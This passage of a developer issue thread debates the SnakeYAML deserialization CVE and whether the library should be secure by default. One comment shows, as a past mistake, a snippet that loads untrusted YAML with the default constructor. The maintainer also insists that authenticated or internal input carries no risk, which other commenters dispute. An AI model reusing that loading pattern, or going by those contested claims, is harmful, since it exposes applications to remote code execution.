    Above I asked the following question to which, I haven’t seen a response: “Sorry, please help me understand, is this a part of the YAML spec? Would you be so kind as to point to the part of the spec where this is detailed?

    I understand that, as an open source software maintainer, you don’t owe anyone anything. The features you develop, choose to keep in, or disable, are your choice. But I would encourage you to think about the security of your end users software and the amount of damage that can be caused by your end users unintentionally feeding untrusted user input into SnakeYAML in it’s default, insecure, configuration, purely because they don’t understand the security ramifications of that decision.

  44. Jonathan Leitschuh

    100% of the application which use SnakeYAML do not parse data from untrusted sources.

    It seems that RedHat’s RestEasy was leveraging SnakeYaml to parse requests with the content types of text/yaml text/x-yaml & application/x-yaml. RestEasy is a JBoss framework for creating Jakarta RESTful Web Services, and has over 1k stars on GitHub.

    I’ve requested that they issue their own CVE for this.

  45. BrendonMilton

    100% of the application which use SnakeYAML do not parse data from untrusted sources.

    I’m honestly baffled by this claim. This CVE and the so called “low quality tooling” pointed us to a huge security issue in our application. We use SnakeYaml to parse somewhat complex configuration files and while those can only be accessed by admins of the application, that does not mean that they are trusted to execute arbitrary code on a production system. I acknowledge this was our mistake to not just use the SafeConstructor plus our own Tags, but we did not expect that such a huge security issue would be the default. Our bad. And I doubt that we are the only ones making this mistake.

    In my opinion the classification of the CVE is entirely correct and it should remain active until a secure by default behavior is established. The best and easiest option here would be to have to default to the SafeConstructor only and have a warning in the documentation about using the current default Constructor class. Writing your own whitelist is then easy enough by providing your own Constructor if you do not want to support this out of the box.

  46. Andrey Somov

    @BrendonMilton your use case is out of the scope of the issue. It is very sad that because of the low quality tooling you wasted so much time for nothing.

  47. Jonathan Leitschuh

    Hey Andrey,

    Unfortunately, I'm on vacation with family over the holidays until Dec 28th. I'd love to chat though! I don't have telegram, but I do have Signal, Twitter, and Mastodon. I'll send you my contract details via email.

    Cheers!

    Jonathan Leitschuh

  48. Jonathan Leitschuh

    To be clear, the change introduced in 1.34 with the addition of the ClassNameInspector is not sufficient to protect against this vulnerability as it is purely a black list. This black list is already insufficient to known RCE payloads.

    The full fix for this would for SnakeYaml to not support allowing input Yaml to, by default, allow the yaml to specify what classes are instantiated. A safe yaml parser would only allow deserialization to a class structure that is specified by the user without supporting deserialization polymorphism OR would force the user to specify an allow list. Until either of these solutions are implemented, CVE-2022-1471 will be applicable to all current and future releases of SnakeYaml

  49. Lee Coller

    Please rev to version 2.0 and remove the unsafe mechanisms - most (all?) applications would not have need to use the unsafe mechanisms, and by implementing this you will be chasing gadget after gadget just as Jackson did until they finally wised up.

  50. Sam Gleske

    100% of the application which use SnakeYAML do not parse data from untrusted sources. It means “secure by default“ will satisfy the low quality tooling and not the community (which has to suffer a lot because of the breaking backwards-incompatible changes to support quasi “secure“ feature)

    Intro

    Hi there, I am an application developer that parses untrusted YAML from untrusted users (greater than 10k users providing untrusted YAML). I develop a CICD solution for Jenkins (Jervis Jenkins as a service) which has a company self service onboarding model. The Jenkins infra has over 50k jobs in a single Jenkins controller and over 4k users in a single Jenkins controller. I’ll share my perspective on this:

    My pains with SnakeYAML as an application developer

    SnakeYAML has been a challenge to work with. I found a while a go my application to be insecure after static analysis tools like SonarQube and dependency analysis tools like DependencyTrack flagged my application as vulnerable. I had to painstakingly go through all of the places I use SnakeYAML and initialize with SafeConstructor.

    Additionally, new SafeConstructor() has been deprecated so again I had to go through all of my application code to stop using a deprecated constructor (a second time in all similar places).

    I’ve decided to centralize all YAML operations into a static YamlOperator class. Design choices of SnakeYAML is forcing me to make design choices I wouldn’t normally make.

    My journey doesn’t end there. I have Jenkins infrastructure that is also using its own YAML processing (pipeline code) and Jenkins plugins that is doing its YAML processing using SnakeYAML. From my perspective, I’ve wasted engineering cycles that would have been avoided if SnakeYAML took a secure by default approach.

    When I started using SnakeYAML purely for its processing of YAML text I did not know that it was a full Java object marshaller and unmarshaller.

    Hopefully, you’ll change your mind on sane defaults even if you feel the need to bump the major version for a new release.

    Summary

    As far as I can tell, using SnakeYAML for marshal and unmarshal in Java is very niche and not something I’ve encountered often professionally. Nearly all uses of SnakeYAML I’ve found use it purely for its text processing capabilities of static YAML (and features of YAML like anchors and aliases).

    Please take a secure by default approach

  51. Spencer D

    Andrey,

    Your abrasive attitude and lack of willingness to work with the multitude of incredibly smart people in this thread that are offering explanations, use case scenarios, and immensely helpful suggestions, is unprofessional and uncharacteristic of open source development collaboration. I have watched this thread for weeks and finally had to chime in because I am astounded to see a developer with such rude responses over and over again, to incredibly polite and talented people. Your anger and frustrations with vulnerability tools is misdirected towards everyone here and frankly I am saddened to see it. Please understand that many of us just want to help get this resolved (properly, and not with a band-aid fix like a black list) as quickly as possible. We are asking you to work with us on this and foster a community of helpfulness, not abrasiveness.

  52. Andrey Somov

    Dear @Sam Gleske , you post requires some time for explanation.

    1. Can you please provide the link to your project of the name of the company ? I am afraid you do not take data from untrusted source. Your users must authenticate to send the data (according to what I read in your post)
    2. I do not understand why the deprecation of the new SafeConstructor()becomes a topic here. It is totally unrelated to this discussion. The code changes - it is natural. It will be changed later as well.
    3. It is a good practice to write code once. I do not get your statement that you have to “centralize all YAML operations“. You should do regardless of anything - please keep doing it in the future
    4. You know now that YAML (which only comes from untrusted source, which is never the case!) may contain tags and unmarshal custom Java instances. You have enough means to prevent it. Your issue is solved.

    Real projects do not have any issue. It is only to satisfy low quality tooling (finally everyone agrees that the tools have low quality because they are unable to do the job properly)

    N.B. Just for your information. The LoaderOptions in your YamlOperator class should be stricter if the data really comes from an untrustred source. SnakeYAML has means to restrict recursive keys, numbers of aliases for collections and the data size. Use it since you should know how your expected data must look like.

  53. Sam Gleske

    Can you please provide the link to your project of the name of the company ? I am afraid you do not take data from untrusted source. Your users must authenticate to send the data (according to what I read in your post)

    In my last reply I provided a link to my project, Jervis. For company-wide CICD solutions it is naive to suggest you should trust all of the users. I have a zero-trust model. Any self service solution should be operating on a zero-trust model to protect users from themselves. Compromised CICD infrastructure is one of the worst compromises a company could have due to its centralized nature and broad access.

    I do not understand why the deprecation of the new SafeConstructor()becomes a topic here. It is totally unrelated to this discussion. The code changes - it is natural. It will be changed later as well.

    It is related. If new Yaml() had a safe implementation as a default I would not have to worry about the details of SafeConstructor. new Yaml() would handle the details of not using any deprecated constructors.

    It is a good practice to write code once. I do not get your statement that you have to “centralize all YAML operations“. You should do regardless of anything - please keep doing it in the future

    My project has 0% code duplication for its maintainability reported by SonarQube. Relying on a library helps with that. It makes less sense if the entire library (SnakeYAML) must be contained to one class for an entire project.

    You know now that YAML (which only comes from untrusted source, which is never the case!) may contain tags and unmarshal custom Java instances. You have enough means to prevent it. Your issue is solved.

    Plenty of YAML comes from an untrusted source and I gave my case for it. It is abnormal for a library handling a data format (yaml/json/xml/whatever) to do unmarshal by default without extra setup or options.

    I should not have to know this when a library gives its recommended usage.

    N.B. Just for your information. The LoaderOptions in your YamlOperator class should be stricter if the data really comes from an untrustred source. SnakeYAML has means to restrict recursive keys, numbers of aliases for collections and the data size. Use it since you should know how your expected data must look like.

    Can you please elaborate? The YAML truly comes from untrusted sources and I need the library to not be a source of compromise for the hosted service. How would I change LoaderOptions to be more secure? I’ve seen others use LoaderOptions this way so they probably do not know, either.

    Please adopt a secure by default approach for basic instantiation.

  54. Andrey Somov

    Well, your use case has nothing to do with the issue. The data only comes from trusted sources. Your users must be authenticated.

    I should probably create wiki with explanation what to add to LoaderOptions to make it more robust. You can check the Javadoc, it should provide more information.
    By the way, the extra properties will NOT be activated by default, because they depend on the context.

    @Sam Gleske please be aware that if the default is changed - you do not have to upgrade !!! Because you already use SafeConstructor. Why do you need any change if you already solved your issue ???

  55. Andrey Somov

    Spencer D,

    Your abrasive attitude and lack of willingness to work with the multitude of incredibly smart people in this thread that are offering explanations, use case scenarios, and immensely helpful suggestions, is unprofessional and uncharacteristic of open source development collaboration.

    This is unacceptable, I will skip it once

    Your anger and frustrations with vulnerability tools is misdirected towards everyone here and frankly I am saddened to see it

    Well, my anger with the low quality tooling should help others to understand the context. I do my best to explain. If you really read all the posts, you should see the amount of confusion. (Like they say that a whitelist will be controlled by devops and not developers. 🤔 )

    All the reported use cases are about parsing internal configuration. This is NOT a problem. Please read the CVE. It is ONLY a problem for the low quality tooling.

    Why should the Open Source community suffer from the false positives of the low quality tooling ?

    Please understand that many of us just want to help get this resolved (properly, and not with a band-aid fix like a black list) as quickly as possible.

    What stops you ? You can fix your project and continue.

    I am afraid you expect something else - you want to shut the low quality tooling up because they report a false positive.

    All I want is developers to come to the origin of the problem and help their low quality tooling to radically improve the quality of the reports (especially when the low quality tooling is asking money to produce the low quality reports)

    By the way, your message sounds like a demand. I hope it is not the case. Otherwise please send me a link to your Open Source project which you maintain in your free time over 10 years to see if you can demand.

  56. Jonathan Leitschuh

    Hi all,

    I had a call with Andrey last week which was very pleasant and I learned quite a bit from.

    You’ll have to excuse that it's taken this long for me to respond on this thread, I was on vacation last week and now have a cold unfortunately.

    During our call, Andrey asked me to reiterate a point, which I do agree with: there is no security risk if you are not processing untrusted user input. This statement is true. That being said, there are many applications that do parse untrusted YAML so it would be good to ensure this library is secure by default.

    To that end, I proposed that the change we make is to modify SnakeYaml so it doesn't process class names in, what in the YAML spec are called “global tags”. By not reading class names and attempting to instantiate classes from these global tags, at least not by default, I believe will remove vulnerability from SnakeYaml allowing it to safely operate on untrusted data without leading to this remote code execution vulnerability.

    Your abrasive attitude and lack of willingness to work with the multitude of incredibly smart people in this thread that are offering explanations, use case scenarios, and immensely helpful suggestions, is unprofessional and uncharacteristic of open source development collaboration.

    Spencer, please keep in mind the saying “Open Source is ‘free’ as in ‘free puppy’“. Andrey doesn't owe us anything, nor do we have a right to direct him to do anything with this project he doesn't want to. That being said, the purpose of this thread is to try to come to a common understanding.

    I believe, prior to my call with Andrey, the ask I, as a security professional, was making, was unclear and scoped too broadly. During my conversation with Andrey we were able to come up with a narrowly scoped fix to adequately protect end users.

    It’s my plan to open an issue with the proposal to disable global YAML tag processing by default after the new year when I'm back at my desk regularly.

  57. Jonathan Leitschuh

    Anyone who wants to learn more about global tags, see the spec.

    https://yaml.org/spec/1.2.2/

    According to Andrey, most YAML parsers interpret the Global tags to mean “instantiate a class of this type”, as some sort of unwritten contract. Unfortunately, this means this vulnerability exists in quite a few YAML parsers. It's my intention to reach out to other maintainers in other languages to try to get this vulnerability eradicated industry-wide

  58. Andrey Somov

    This is the issue

    Please be aware that SnakeYAML does not implements YAML 1.2, only YAML 1.1. This is mentioned on the main page. The correct link is this: https://yaml.org/spec/1.1/#global tag/

    Still no single use case when data comes from untrusted source was reported. It shows how the low quality tooling wasted time of the community. The only real use case I know is an on-line parser. But either the low quality tooling does not complain, or the application does not care. Because they do not seem to be anyhow affected for many years.

  59. Andrey Somov

    @Sam Gleske I will use your use case as the perfect example for low quality tooling:

    SnakeYAML has been a challenge to work with. I found a while a go my application to be insecure after static analysis tools like SonarQube and dependency analysis tools like DependencyTrack flagged my application as vulnerable. I had to painstakingly go through all of the places I use SnakeYAML and initialize with SafeConstructor.

    1. You are not affected and the low quality tooling make a false statement (because they cannot take your context into account).
    2. Even after you changed your app to use SafeConstructor the low quality tooling is still complaining (because they do not follow the advice of the CVE)
    3. Even after the suggested fix (which will not be done) the low quality tooling will make another false conclusion that your app works properly even though you might configure it to accept any class to be instaniated
    4. The low quality tooling fails to create sound reports - why should we trust it ?

    The only solution is to go to the low quality tooling and help them to improve the quality. They cannot create false positive based solely on the name and version of the library. Or they have to explain that they are most probably wrong.

  60. Sam Gleske

    When those reports were made my application was using SnakeYAML by its default recommended documentation. That “low quality tooling” saved my application from having a remote code execution vulnerability caused by SnakeYAML recommended code usage. At the time those reports were created I was using SnakeYAML the following way.

     import org.yaml.snakeyaml.Yaml
     ...
            def yaml = new Yaml()
            jervis_yaml = yaml.load(untrusted_raw_yaml)?: [:]
    

    They were legitimate reports and not a false positive or low quality.

    My application relies on untrusted YAML provided by unknown users.

    Are you saying you guarantee there’s no RCE vulnerability for the above usage of SnakeYAML? As far as I can tell, the above code example has a vulnerability and so those reports helped me improve my software.

    After I changed my code the security tools stopped reporting a vulnerability in my application.

    Main issue

    SnakeYAML by its default constructor is really easy to have an unsafe configuration with untrusted YAML. You ignored my use case and rephrased my words inaccurately.

    new Yaml()
    

    A better usage of your time could be to change SnakeYAML not have possibility of RCE with default Yaml constructor. As opposed to arguing with waves of developers misconfiguring your library with default constructor usage.

  61. Andrey Somov

    @Sam Gleske

    it is not me it is the CVE

    We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization.

    Unfortunately, the low quality tooling does not care. As always.

    It is very sad that even after the above explanations from Jonathan you still insist on the wrong solution.

    But I fully understand your pain from using the low quality tooling and their inaccurate reports.

  62. Sam Gleske

    Are you saying it is not possible to have RCE by using new Yaml() (safe for untrusted Yaml)? As in you made changes to it since 2020 when I first saw the reports?

  63. Sam Gleske

    @Andrey Somov thanks for your earlier review. I updated my code with configuring the LoaderOptions with my use case. If I have more questions I’ll post in a forum. I think I might be distracting this issue so I’ll avoid commenting unless you have a question directly for me.

  64. BrendonMilton

    The “low quality tooling” did exactly what it was supposed to do and alerted me to an easily exploitable RCE vulnerability in my codebase that was caused by insecure default settings within snakeyaml. It's not gonna notice that i have fixed the issue within my codebase, but I would argue that that is not it's job.

    Anyway, the issue is fixed by disallowing global tags by default/whitelisting of allowed global tags. That was the ideal solution for me, so thank you Andrey and Jonathan for working on this issue.

  65. Andrey Somov

    @BrendonMilton if does not noticed that it is fixed, how does it know that it is there !!! It may be not present in the beginning !!!
    But the low quality tooling does not care.

    I do care because a lot of users (absolute majority) who are not affected come to me, send me personal e-mails, pollute the issue tracker with the same reports.

  66. Adarsh Ramamurthy

    Hi @Andrey Somov will v2.0 be released as per the normal release cadence of this project (August and February) or are you planning to cut an ad-hoc release sooner than that? Thanks for all the great work by the way.

  67. Jonathan Leitschuh

    Whenever the version with the fix is released, it’s my intention to request another CVE number with an explicit fixed version for this vulnerability. AFAIK, the vulnerability industry isn’t spectacular at retroactively updated information in CVE numbers, they are better with new CVE numbers being issued. This will help encourage end users to update their dependencies to this new safe version.

  68. pjfanning

    @Jonathan Leitschuh please don’t raise another CVE. I volunteer with the Apache Software Foundation security team and we regularly update CVEs and tools are quite good at picking up the edits - with possibly a delay of a few days. If a particular tool doesn’t pick up the CVE edits - then go after the maintainers of the tool.

  69. Yi Gong

    Hi guys,

    I am not experienced in snakeyaml and got a bit confused after reading the wiki and this issue ticket. We happen to have snakeyaml as a transit dependency for one of the 3pps we use.

    My question is, is it still vulnerable even with SafeConstructor when constructing Yaml()? Or is it good enough if SafeConstructor is used?

    Thanks in advance.

  70. Andrey Somov

    @Yi Gong, you are not affected. Unless you blindly download a YAML file from internet and feed it to your application. Do you ?

    You should use the SafeConstructor IF AND ONLY IF you download files from internet from untrusted sources (no authentication, no authorisation). When you use SnakeYAML to parse a YAML file which you maintain - you are not affected at all. It is a false positive for you.

  71. Yi Gong

    Hi @Andrey Somov ,

    Thank you for the quick reply. Sorry I haven’t given any detail about the 3pp.

    The referred 3pp is kubernetes-client from fabric8io https://github.com/fabric8io/kubernetes-client. The client talks with kubernetes API server and mainly uses snakeyaml to perform deserialization of yamls in responses from a k8s API server.
    According to the source code, https://github.com/fabric8io/kubernetes-client/blob/master/kubernetes-client-api/src/main/java/io/fabric8/kubernetes/client/utils/Serialization.java#L256
    SafeConstructor is used without any additional LoaderOptions.
    I think in our context, the client talks with a trusted server so there is barely anything to worry about.

    However, just to be on the safe side and to better understand the impact myself,
    if we indeed use snakeyaml to parse a yaml file from unrested sources, does SafeConstructor would help to mitigate this specific vulnerability? Or is the fix required for mitigation, even when SafeConstructor is used?
    Thanks in advance.

  72. Andrey Somov

    Can you please go to the issue tracker of your tool and report a false positive ? Your code is already using SafeConstructor and it means that regardless whether the data is trusted or not you are safe. The low quality tooling creates a lot of noise. Please help them to improve the quality and reduce the noise - they should be aware that you loose time for nothing.

  73. Istvan Bartok

    Hi @Andrey Somov ,

    could you please help me? Do I understand well that the usage of SafeConstructor mitigates this issue? Is it possible to deserialize a custom java object in a secure way with the SafeConstructor? In this case do I have to write a custom resolver for my class? Or what is the best way?

    Thanks in advance!

  74. Andrey Somov

    @Istvan Bartok do you blindly take the YAML file from the internet or you are going to provide an internal configuration from a resource in your classpath ?

  75. Andrey Somov

    @Istvan Bartok

    • you are not affected, you can keep using SnakeYAML the way you do. No need to use SafeConstructor. All the files can be manually modified - this is not an issue.
    • can you please report a false positive for your tool ? They must be aware that the quality of their report is very low and please help them to improve it (if you do not complain they do not have to improve). You cannot imaging how much time I already wasted because of this. PLEASE HELP ME !!! If you want to keep using SnakeYAML, please try to make my life bearable.
    • there are a few ways to go forward for those who really take untrusted files from the internet (even though not a single use case was reported so far)

    PLEASE HELP ME !!!

  76. Tomas Hofman

    The question is not whether the YAML file is “taken from the internet” or “can be modified manually”, but rather can the YAML content come from an untrusted source?

    If so, and if it’s not possible to upgrade to safe version of SnakeYAML (which hasn’t been released yet, unless I missed it), what are the steps that should be taken to avoid the vulnerability?

    Perhaps if this question is answered clearly, people will stop asking on case by case basis. It should be answered irrelevant of whether the particular cases mentioned above fall into the vulnerable category or not.

  77. Andrey Somov

    The YAML source coming from your classpath is trusted.

    Please be aware that all the versions ARE safe. Only for untrusted sources BY DEFAULT, it may be not safe. Those who download data from untrusted sources must take special precautions. I may describe the possible solutions in a wiki. The current version has enough means at your disposal to solve the issue even for untrusted sources. No need to wait for the release.
    The biggest problem is that the low quality tooling will keep complaining with false positives even after the code is adapted.

  78. Tomas Hofman

    I may describe the possible solutions in a wiki.

    I think that would be very reasonable solution, and appreciated by many people!

  79. Patrick Heck

    This has been a long and interesting read. I completely sympathize with the difficulties of frequent reports of CVE’s detected by tooling. With input from others on the project I recently helped rewrite the Solr Security News page, which seems to have helped cut down on the number of inappropriate emails to our security list (meant for new discoveries to be kept private, not communications regarding public stuff). One can hope that if something like VEX gains support (https://github.com/oasis-tcs/csaf/blob/master/csaf_2.0/prose/csaf-v2-editor-draft.md#45-profile-5-vex) then the upstream projects won’t have to pass the buck to the downstream dependencies when they haven’t used the dependency in an unsafe manner. Until the folks who wrote the software and have the context to judge the problems reasonably can be given a conduit to express their judgements in machine readable format, we all will have to work a bit harder.

    One thing I see above I don’t agree with is this repeated assertion that one cannot have a vulnerability accepting data from an authenticated/authorized user. This embeds the assumption that every one who ever used YAML understood all the possible features of it and the extension usages common in the industry that exceed the specification (ref: global tag class loading). It’s entirely likely that a very reasonable and competent programmer intending to accept configuration changes from a user. Yaml is a very pleasing format for communicating configuration and so it’s likely to get used. The fully authenticated and authorized user supplying the configuration is supposed to be able to change configuration, but they are usually NOT meant to be able to run arbitrary code on the hosting server. The easy to imagine case for this would be a multi-tenant application with end-users, tenant-admins, and super-users. The end-users, just use whatever is configured. Tenant-admins specify per-tenant configuration and are employed by paying customers, but would never be granted access to machines, or other tenants, and super-users are the logins for the company that owns the servers and wrote the software and sells the services. If tenant-admins are allowed to specify the configuration they control in YAML and the developers didn’t understand every last little bit of what could happen in a YAML file, tenant admins might be run code that gives them visibility into other tenants, or takes down servers impacting other tenants, etc. Imagine the fun if someone at Lowes figures out how to wipe out Home Depot’s data via supplied config…

    Technically it’s an error by the programmer that decided to accept YAML for user supplied configuration, but it’s also analogous to a roadway with a low bridge that is unmarked. Sure the driver of a 12ft tall truck shouldn’t drive into the 11ft 6in bridge. Technically, if there is doubt the driver should get out and measure before going under or at least approach very very slowly…. But people tend to assume safety by default, and occasionally they are in a hurry, so we put up big bright signs and make people ignore chains or poles banging off their truck (or in the case of software, we force them to enable non-default configurations) to keep people from hurting themselves, and someone’s grandma who was unlucky enough to be driving under the bridge at the same time. Some people still ignore everything (or enable the non-default config without understanding why it’s off by default) but at least we can save some of the bystanders who don’t deserve an entire college dorm of furniture falling on their front windshield, or an hour long wait in traffic on the way to a job interview or the airport… etc… https://www.wbur.org/news/2021/08/27/college-moving-boston-storrow-drive

    Another problem that arises over time is that someone assesses the usages at the time the issue is detected and verified to be a “Not a Problem” and then someone adds a new feature that exposes the previously unexposed vulnerability. Then the organization has ignored the detected CVE and has no way to know that they became vulnerable. (some tools like ForbiddenAPIs might help). Also, an imported dependency might get used by an intern inadvertently because it was suggested by an IDE. So it’s not entirely unreasonable for large organizations to want libraries to be safe by default. As irritating as all of this is none of us want to see companies go out of business, or people get laid off due to revenue loss after lawsuits, or worse yet end-users have identity or money stolen because of these sorts of things. That stuff really hurts real people most of whom were not the programmer.

  80. Jonathan Leitschuh

    Some people still ignore everything (or enable the non-default config without understanding why it’s off by default) but at least we can save some of the bystanders who don’t deserve an entire college dorm of furniture falling on their front windshield, or an hour long wait in traffic on the way to a job interview or the airport… etc… https://www.wbur.org/news/2021/08/27/college-moving-boston-storrow-drive

    Hey, I live in Boston! How could you disparage the anual tradition of some poor out-of-state driver delidding a Uhaul on college move in day (informally known as “Storrowing”)! Every Bostonian knows we live for these stories! (Everything said in this paragraph is sarcasm)

    In all seriousness, Patrick, you make some really good points which I fully agree with.

  81. Andrey Somov

    @Patrick Heck Ok. I agree that in some cases YAML from an authenticated user my be harmful. How does it help to improve the low quality reports ? The low quality tooling ignores the context anyway. Absolute majority of use cases is either internal configuration provided in the classpath, or machine-to-machine data exchange. In both case it is safe.

    If only those who are really affected come here, you would never read this ticket. Those who are really affected can fix it themselves and they do not need any support from SnakeYAML. The new release is not required. The release with a quasi fix is ONLY required to shut the low quality tooling up.

    By the way, the quasi fix is very questionable, because those who may accept YAML from untrusted source may very easily configure to run any global tag and the low quality tooling will NOT warn them.

    I find it very important to give the community enough information to go to the tooling and request to improve the quality.

    By the way, I see the explicit lie on the issue tracker of one of the low quality tooling about “the maintainers“ of SnakeYAML. It means they read it - I hope they will try to improve.

  82. Joshua Wisniewski

    The problem is, there are NO trusted sources anymore. Insider threats are quickly becoming the biggest threats:

    https://hbr.org/2014/09/the-danger-from-within
    https://techjury.net/blog/insider-threat-statistics/#gref

    Unfortunately, some of us users of snakeyaml work for corps that are very sensitive to security threats as our brands reputation depends on solid security practices by all of our code and dependencies. Think of the implications of the EU GDPR for security violations, it’s an enormous hit to revenue. Corps can’t rely on dependencies that assume input artifacts can be trusted.

  83. Andrey Somov

    @Joshua Wisniewski your link did not add anything to the topic. Otherwise please point me exactly to the place.

    This is yet another misunderstanding: dependency does NOT make any assumptions. It is the user (you) make the assumptions. The dependency does not take any input, you provide the input.

    If there is no trusted source we can stop our business.

  84. Andrey Somov

    To clarify yet another time:

    1. no need to wait for the the release to fix a possible security issue if it exists (it is possible to do with the current, “vulnerable“ version)
    2. the implemented change does NOT fix this issue. If the application configures the parser to create any global tag - SnakeYAML will follow the order (this is a feature, not a bug)
    3. the only thing which is different in the fix - SnakeYAML will not create global tag by default (only global tags might execute code)

    The whole issue is to shut the low quality tooling up. You do not need any assistance from this library to do it.

  85. Ava Adore

    Hello,

    If you don’t need the functionality of a library, the best strategy to actually handle it’s potential security issues is to not use it at all.

    For transitive dependencies, as with spring, you can probably safely exclude it in the dependencies, as long as you use the application*.properties format to configure your system, rather than the application*.yaml format. For instance with maven and spring-boot:

    ```

    ...
    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter</artifactId>
        <exclusions>
            <exclusion>
                <groupId>org.yaml</groupId>
                <artifactId>snakeyaml</artifactId>
             </exclusion>
        </exclusions>
    </dependency>
    ...
    

    That makes the library go away with all its (potential) security flaws, and thus shuts up the “low quality tooling” very effectively ;-).

    BTW: keep this strategy in mind for other dependencies, too. It can’t hurt to evaluate from time to time, which dependencies are really needed in a software project.

  86. Andrey Somov

    Spring is not affected - it is a false positive. If you use Spring to parse internal configuration you are safe. The only solution is to fire a bug in your low quality tooling (otherwise their quality will not grow)

  87. Ava Adore

    Hm, maybe. But maybe not, I don’t know. I don’t know all the users and their use cases, capabilities, restrictions etc… so I cannot say that everybody who uses spring in whatever manner is not affected.

    But I know that the systems where spring is used can be quite big and complex. The configuration is not necessarily internal… even if it was, there could be the upset admin who has access and manipulates configuration files in a harmful way. But apart from that, spring configuration can come from various places: files, kubernetes config maps or even remote configuration servers which could have been tampered to inject malicious YAML content. It's a very naive misconception to state that spring users are generally not affected because configuration is internal… that is simply not necessarily the case.

    Furthermore I don’t know how the library is used when it comes in as a transient dependency. I.e.: did the spring maintainers take care of input validation, do they filter global tags? Do they instantiate the objects in a safe manner? (no need to answer these questions, they are rhetorical). The point is: No, I don’t know it. And I cannot do anything about it… I couldn’t even do anything if I knew answers to these questions.

    All I can do is to trust the “low quality tooling” to tell me that there is a potential problem, and to hope that the project maintainers take that serious and fix it. If they don’t, I am forced to watch out for alternatives, or, in the simplest possible case, not use the library anymore.

  88. Andrey Somov

    even if it was, there could be the upset admin who has access and manipulates configuration files in a harmful way.

    this a totally different issue - if somebody can provide another configuration file (or another JAR file), this is no vulnerability (the possibility of being attacked).

    This issue clearly the amount of confusion and misunderstanding (thanks to the low quality tooling)

  89. Patrick Heck

    The reason so many people get excited about this is because there are may use cases where access to the configuration file is a different permission than access as the user running the code that reads the configuration. The user that the server runs as may have access to (for example) a database or file system that the user providing the configuration does not. This effectively escalates the privileges of the configuration provider to those of the configuration reader. In small organizations this is often a no-op because the provider is a sysadmin with greater privileges, but in large organizations the configuration may be provided by developers, or modified by tooling written by other departments or third parties, or exposed (in whole or in part) to end users etc., and those folks are not meant to have access to said database or file system (or whatever).

  90. Andrey Somov

    @Patrick Heck what you describe explicitly out of scope for the CVE. Please read it. It is only valid when the configuration is provided by an external party.

    The clarification form the Open Source Software Security Researcher is also in this thread.

    The coming fix will not change anything for your case. Nothing at all.

    (I think the issue should not be closed soon to spread the knowledge.)

  91. Patrick Heck

    The phrase “external party” is rather pointless. The location of the party isn’t important at all. It’s whether or not you trust them. “Untrusted parties” are what I described.

  92. Ava Adore

    @Andrey Somov , I don’t understand why you care so much about where your input comes from or who provides it. As a library maintainer, that is completely out of scope for you - you shouldn’t care at all where the input comes from or whether the people who provide it are trustworthy.

    You should treat all input as being untrusted and implement reasonable measures to mitigate the risks that follow from that fact. The idea of white listing has already been mentioned among others.

    And if that breaks your API, so be it. Bump up the major version and let the library consumers know that they need to migrate (in the release notes). It’s then their responsibility to do so.

    To clarify that, you cannot treat your input as trusted and push the responsibility of ensuring that to your consumers. Snakeyaml is a public extension which might be used by thousands of developers in as many projects and extensions, as direct and transitive dependency, in systems, services and workflows you might not even imagine. You cannot know all of them. And more importantly, most of them have no influence of how snakeyaml is used. Especially when it comes in as a transitive dependency… I, for instance, didn’t even know that snakeyaml exists, until the “low quality tooling” reported this security issue with it.

  93. Alexander Maslov

    FYI, master branch (and hopefully also latest 2.0-SNAPSHOT jar) already has all DenyALL “global tags” which should prevent creation of anything outside of default map, set, number, string …..

    It also has a tools for developers to make their own decision which tags are acceptable, also there is an implementation which Accepts All global tags (just in case you don’t care about this CVE “noise”).

    This is not yet resolved because of different reasons, one of those:

    gather all those invaluable recommendations on how to maintain this project.

    Thank you and hope this lib is and will be useful for you 😉 ✊ And we all here are making it better actually.

  94. Andrey Somov

    The phrase “external party” is rather pointless. The location of the party isn’t important at all. It’s whether or not you trust them. “Untrusted parties” are what I described.

    I am talking about Untrusted parties. The issue is that your problem will stay regardsless of the provided fix. Why do you demand a change which does not improve anything for you ? (except the low quality tooliong will shup up)

    You should treat all input as being untrusted and implement reasonable measures to mitigate the risks that follow from that fact. The idea of white listing has already been mentioned among others.

    Wow, all the nessesay measures are there !! Please read the CVE. As I told many times, you do not need any release to fix the issue if it exists for you. The only thing you cannot do - to shup the low quality tooling up.

    I, for instance, didn’t even know that snakeyaml exists, until the “low quality tooling” reported this security issue with it.

    Keep having a nice life. If you do not come to you low quality tool, they will bother you forever with false positives (as they currently do)

  95. Ava Adore

    @Alexander Maslov thanks for the info. Looking forward for the 2.0 being released :-)!

    @Andrey Somov

    Wow, all the nessesay measures are there !!

    Just being there is not enough. You must also ensure that they are actually used. This was mentioned as “security by default” in the discussion here above. Library consumers should be able to opt-out of security, not to opt-in.

    Because the sad truth is that most people/developers just don’t care. Its human to take the shortest and most convenient path to a solution, not reading documentation or wiki, just follow the most simple tutorial and bring that into production, etc. It happens all the time. When security is not on that path, it gets bypassed. Only later, when the damage is there, they look back and wonder how that could have happened… It's better to force them to their luck in advance.

  96. Andrey Somov

    Just being there is not enough. You must also ensure that they are actually used. This was mentioned as “security by default” in the discussion here above. Library consumers should be able to opt-out of security, not to opt-in.

    This what I am trying to say - it is NOT about what is in the library, it is all about HOW it is used !!!!
    Please help me to spread this knowledge !

    Unfortunately, the low quality tooling confuses a lot. They do not care how it is used.
    What the library has now is enough to be safe. The fix which is going to be delivered will NOT be enough ! It can be used in such a way that it is even worse !

    Library consumers should be able to opt-out of security, not to opt-in.

    this is no boolean, secure or not. There is no simple in-out. There will be no simple in-out.

  97. Caleb Ciampaglia

    I appreciate all the hard work like those that contribute to snakeyaml dedicate to their projects. That work saves the rest of us a lot of time and brain cycles so that we do not need to think about these things too much.

    In my opinion, whenever possible a developer should need to jump through hoops (make inconvenient method calls, add explicit configuration flags, etc.) to use a library in a potentially insecure way. Its not good enough for the capability to exist (to use the library securely), it should be the default, easiest way to use the library (without needing to read docs to find it). And, yes, the assumption should be that untrusted inputs are provided. The “low quality tooling” is partially correct here – its too easy for the library to be used in an insecure way and so the tool needs to raise an alert for consumers to investigate further.

    While Snakeyaml was built to implement a spec and the spec permits insecure usage, how that insecure part of the spec can be implemented matters. I agree with @Ava Adore in that the people are much more likely to use the most straight-forward, cleanest looking code (without reading docs) so that code should assume the most secure usage of the library.

